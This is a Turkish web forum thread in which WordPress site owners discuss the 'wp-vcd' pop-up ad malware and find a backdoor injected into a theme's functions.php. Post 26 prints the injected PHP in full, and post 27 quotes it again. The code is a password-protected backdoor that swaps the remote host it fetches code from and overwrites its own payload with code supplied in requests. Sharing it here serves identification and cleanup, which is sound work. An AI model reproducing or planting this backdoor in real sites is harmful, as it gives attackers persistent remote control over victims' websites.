0
Kayıt Ol

Wordpress Pop-up Reklam Virüsü ( wp-tmp & wp-vcd.php )

60

15.394

  • 25-01-2018, 04:05:50
    #19
    Helix
    Helix
    Botman, Codemaster
    YouNeverKnows adlı üyeden alıntı: mesajı görüntüle
    bence o şifre değil bizde functions da cıktı kodlar ama böyle degildi. Tema açılmıyor dedğin kodu silince site pm at bakayım istersen sucuri ile taradın mı
    Benim sitede sorun yok hocam. Hocam o resmen özel yetki anahtarı. Ne için kullanılıyor bilemem ama temanı gözden geçir.
  • 25-01-2018, 04:08:12
    #20
    YouNeverKnows
    YouNeverKnows
    Üyeliği durduruldu
    HelixTm adlı üyeden alıntı: mesajı görüntüle
    Benim sitede sorun yok hocam. Hocam o resmen özel yetki anahtarı. Ne için kullanılıyor bilemem ama temanı gözden geçir.
    Arkadaşa yazdım bakarım blackdoor olabilir
  • 25-01-2018, 04:09:29
    #21
    Helix
    Helix
    Botman, Codemaster
    YouNeverKnows adlı üyeden alıntı: mesajı görüntüle
    Arkadaşa yazdım bakarım blackdoor olabilir
    Bende ondan şüpheleniyorum. Tema içinde bu kodun kullanılması saçma.
  • 25-01-2018, 04:23:38
    #22
    YouNeverKnows
    YouNeverKnows
    Üyeliği durduruldu
    evet sanırım sorunu buldm bende 1 ay önceki yedekten cıkardım functions.php öyle bir kod yok hatta kodlar çok farklı. Neyse eskisini atayım dedim site gider mi diye korktum. Tam tersi site gitmedi ve herşey çalıştı. Birisi belli ki blackdoor eklemiş. Ancak tema dosyaları kapalı kaldığı için birşey yapamamış. Çünkü ftp herşey kısıt koydurdum. Arkadaşa teşekkür ederim. Basit birşey gibi görünsede ileride büyük sorunlara yol açabilirdi.
  • 25-01-2018, 04:25:47
    #23
    Helix
    Helix
    Botman, Codemaster
    YouNeverKnows adlı üyeden alıntı: mesajı görüntüle
    evet sanırım sorunu buldm bende 1 ay önceki yedekten cıkardım functions.php öyle bir kod yok hatta kodlar çok farklı. Neyse eskisini atayım dedim site gider mi diye korktum. Tam tersi site gitmedi ve herşey çalıştı. Birisi belli ki blackdoor eklemiş. Ancak tema dosyaları kapalı kaldığı için birşey yapamamış. Çünkü ftp herşey kısıt koydurdum. Arkadaşa teşekkür ederim. Basit birşey gibi görünsede ileride büyük sorunlara yol açabilirdi.
    Sorunu çözdüğüne sevindim. Umarım sorunu olanlar çözebilirler. İyi geceler.
  • 25-01-2018, 04:27:07
    #24
    YouNeverKnows
    YouNeverKnows
    Üyeliği durduruldu
    HelixTm adlı üyeden alıntı: mesajı görüntüle
    Sorunu çözdüğüne sevindim. Umarım sorunu olanlar çözebilirler. İyi geceler.
    wordpres siteler aşırı hacklink var hayatımda 6 yıldır ilk kez yaşadım tşk ettim tekrar. Çoğu kişi haberi bile olmuyordur ekli olduğu halde.
  • 25-01-2018, 04:28:54
    #25
    Helix
    Helix
    Botman, Codemaster
    YouNeverKnows adlı üyeden alıntı: mesajı görüntüle
    wordpres siteler aşırı hacklink var hayatımda 6 yıldır ilk kez yaşadım tşk ettim tekrar. Çoğu kişi haberi bile olmuyordur ekli olduğu halde.
    Genelde bilinçsiz kullanılan pluginlerden ve temalardan bulaşıyor. Aynen.
  • 25-01-2018, 04:32:14
    #26
    YouNeverKnows
    YouNeverKnows
    Üyeliği durduruldu
    HelixTm adlı üyeden alıntı: mesajı görüntüle
    Genelde bilinçsiz kullanılan pluginlerden ve temalardan bulaşıyor. Aynen.
    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'xxxxxxxxxxxxxxxxxxxxxxxxx'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {

    if (!empty($_REQUEST['newdomain']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    {
    $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;
    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {

    if (!empty($_REQUEST['newcode']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
    {
    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;

    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
    }

    olayı çözdüm orjinal dosyanın üstüne eklemişler
  • 25-01-2018, 04:42:51
    #27
    Helix
    Helix
    Botman, Codemaster
    YouNeverKnows adlı üyeden alıntı: mesajı görüntüle
    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'xxxxxxxxxxxxxxxxxxxxxxxxx'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {

    if (!empty($_REQUEST['newdomain']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    {
    $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;
    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {

    if (!empty($_REQUEST['newcode']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
    {
    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }

    }
    }
    }
    break;

    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
    }

    olayı çözdüm orjinal dosyanın üstüne eklemişler
    Bu işte hocam. Ben sana dedim, kodun tamamını at diye.